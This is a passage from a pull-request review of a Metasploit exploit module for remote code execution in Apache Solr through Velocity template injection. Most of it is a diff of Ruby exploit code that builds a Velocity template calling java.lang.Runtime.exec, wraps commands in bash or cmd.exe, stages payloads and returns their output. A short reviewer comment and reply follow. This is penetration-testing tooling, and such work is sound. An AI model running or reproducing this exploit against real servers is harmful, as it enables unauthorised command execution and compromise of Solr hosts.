modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,483 @@
+        print_status("Sending CmdStager payload...")
+        execute_cmdstager(linemax: 7130, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+      end
+    end
+
+    # or unix-based?
+    if @target_platform.include? "Linux"
+      if target.name.include? "Unix"
+        if datastore['PAYLOAD'] == "cmd/unix/generic"
+          cmd = "/bin/bash -c $@|/bin/bash . echo #{datastore['CMD']}"
+          exec_and_output(cmd)
+        else
+          cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}"
+          execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+        end
+      elsif target.name.include? "Linux"
+        execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+      # if target is wrong, warn and exit before doing anything
+      else
+        fail_with Failure::NoTarget, "Target is found to be Unix-based, please select the proper target!"
+      end
+    end
+  end
+
+  # for cmd/unix/generic and windows/exec
+  def exec_and_output(cmd)
+    cmd_res = execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+
+    unless cmd_res
+      fail_with Failure::Unreachable, "Connection failed!"
+    end
+
+    unless cmd_res.code == 200
+      fail_with Failure::UnexpectedReply, "Unable to execute command!"
+    end
+
+    final_res = cmd_res.body.to_s.sub("0\n", ":::").split(":::").last.strip
+    print_good(final_res)
+
+    nil
+  end
+
+  # some prep work has to be done to work around the limitations of Java's Runtime.exec()
+  def execute_cmdstager_begin(_opts)
+    if @target_platform.include? "Windows"
+      @cmd_list.each do |command|
+        command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ")
+      end
+    else
+      @cmd_list.each do |command|
+        command.insert(0, "/bin/bash -c $@|/bin/bash . echo ")
+      end
+    end
+  end
+
+  # sic 'em, bois!
+  def execute_command(cmd, opts = {})
+    # custom template which enables command execution
+    template = <<~VELOCITY
+      #set($x="")
+      #set($rt=$x.class.forName("java.lang.Runtime"))
+      #set($chr=$x.class.forName("java.lang.Character"))
+      #set($str=$x.class.forName("java.lang.String"))
+    VELOCITY
+
+    # attempts to solve the quoting problem, partially successful
+    if target.name.include?("Unix")
+      template += <<~VELOCITY
+        #set($ex=$rt.getRuntime().exec("#{cmd}"))
+      VELOCITY
+    else
+      template += <<~VELOCITY
+        #set($ex=$rt.getRuntime().exec('#{cmd}'))
+      VELOCITY
+    end
+
+    template += <<~VELOCITY
+      $ex.waitFor()
+    VELOCITY
+
+    # the next 2 lines cause problems with CmdStager, so it's only used when needed
+    # during the check for PowerShell existence, or by specific payloads
+    exec_payloads = %w[cmd/unix/generic windows/exec windows/x64/exec]
+    if opts['winenv_check'] || exec_payloads.include?(datastore['PAYLOAD'])
```

Comment:
This again should be checking if the target selected is trying to execute a command or not via a `Type` parameter.

Reply:
Also changed in commit 861b79bce7d4ac408e462d2a1b19e7d72cfe82f8